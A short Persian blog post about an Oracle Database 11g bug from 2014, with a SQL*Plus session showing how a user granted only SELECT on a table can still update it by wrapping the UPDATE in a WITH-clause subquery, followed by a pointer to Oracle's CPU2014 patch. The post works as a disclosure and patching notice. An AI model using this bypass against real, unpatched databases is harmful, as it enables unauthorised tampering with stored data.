در Augest سال 2014 یک باگ امنیتی در اوراکل دیتابیس شناسایی شد که کارشناسان اسم Monster BUG را روی آن گذاشتند.

و جالب است بدانید که این باگ تا آخرین ریلیز از نسخه 11g یعنی 11.2.0.4 نیز وجود دارد!!!

در تشریح این باگ بطور خلاصه: در صورتی که به کاربری در دیتابیس دسترسی Select بر روی یکی از جداول خود را بدهید، آن کاربر می تواند با روش زیر جدول مذکور را Update کند:

SQL> create user user1 identified by 123 ;
User created.

SQL> grant create session , create table to user1;
Grant succeeded.

SQL> grant select on scott.emp to user1;
Grant succeeded.

SQL> conn user1/123
Connected.

SQL> select ename , sal from scott.emp where ename='ALLEN';
ENAME      SAL
---------- ----------
ALLEN      3600

1 rows selected.

SQL> update scott.emp set sal=1000 where ename='ALLEN';
update scott.emp set sal=1000 where ename='ALLEN'
 *
ERROR at line 1:
ORA-01031: insufficient privileges

SQL> update (with tmp as (select * from scott.emp) select * from tmp) set sal=1000 where ename='ALLEN';

1 row updated.

SQL> commit;
Commit complete.

SQL> select ename , sal from scott.emp where ename='ALLEN';
ENAME      SAL
---------- ----------
ALLEN      1000

خوشبختانه این مشکل با ارائه Critical Patch Update - CPU2014 توسط شرکت اوراکل برطرف شده است.

شما می توانید با مراجعه به بخش پشتیبانی اوراکل (Support.oracle.com) این patch را جستجو و پس از دانلود برروی دیتابیس خود نصب نمایید.لازم به توضیح است که برای دسترسی به این بخش از سایت اوراکل نیازمند اکانت MetaLink هستید و با کاربری که به طور معمول در اوراکل ایجاد می شود اجازه دسترسی به این بخش را نخواهید داشت.

منبع